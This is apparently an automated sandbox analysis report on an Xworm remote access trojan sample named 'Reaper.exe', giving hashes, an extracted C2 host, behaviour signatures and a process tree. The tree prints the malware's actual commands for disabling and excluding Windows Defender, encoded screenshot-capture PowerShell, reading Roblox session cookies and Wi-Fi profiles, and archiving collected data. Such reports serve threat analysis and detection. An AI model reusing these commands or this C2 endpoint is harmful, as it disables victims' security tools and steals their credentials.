Resubmissions
20-04-2024 17:13
240420-vrrwwadh2z 1012-03-2024 21:36
240312-1f3f5adc57 1010-03-2024 04:41
240310-fbmjwscd28 1010-03-2024 04:40
240310-fan2bscc93 1010-03-2024 04:38
240310-e9wd1scc82 1009-03-2024 07:38
240309-jghpnsdh88 10Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
-
submitted
09-03-2024 07:38
General
-
Target
Reaper/Reaper/Reaper.exe
-
Size
8.3MB
-
MD5
79d145e3962e71bf725d15b4c0261dac
-
SHA1
bc9d7a5a347fcefe3b3b81136e83af294bd489f4
-
SHA256
0ca306be254d1b3aff02ae559e5649e9f0bb10367f692e132d7da39e6860448d
-
SHA512
2fc3cd1b4542de7313ffea8fc16132df9c305c9ca847d4754e3a645c274933b4dd9682b4dd2585c62e5b8b2307e296fb64e32b758222123bb5c901a95ba0b6df
-
SSDEEP
196608:wfojS3EHCg1OgwII+XN6h5BOpEAyRHtt7fEiLrArrIx2j1:wojS3E1zg+XN05UpEAcHtt7MiorGg
Malware Config
Extracted
xworm
l838.ddns.net:3232
-
Install_directory
%AppData%
-
install_file
Runtime Broker.exe
Signatures
-
Detect Xworm Payload 2 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Drops file in Drivers directory 3 IoCs
-
Drops startup file 2 IoCs
-
Executes dropped EXE 8 IoCs
-
Loads dropped DLL 20 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 54 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 37 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAdwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AYwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAbABqACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Reaper.exe"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kd3lbujv\kd3lbujv.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES857C.tmp" "c:\Users\Admin\AppData\Local\Temp\kd3lbujv\CSCCE2CE8B68C5E4A80834A8975E065BF5A.TMP"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵
-
C:\Windows\system32\getmac.exegetmac5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI2282\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\vR7pn.zip" *"4⤵
-
C:\Users\Admin\AppData\Local\Temp\_MEI2282\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI2282\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\vR7pn.zip" *5⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Runtime broker.exe"C:\Windows\Runtime broker.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Runtime broker.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime broker.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Runtime Broker.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
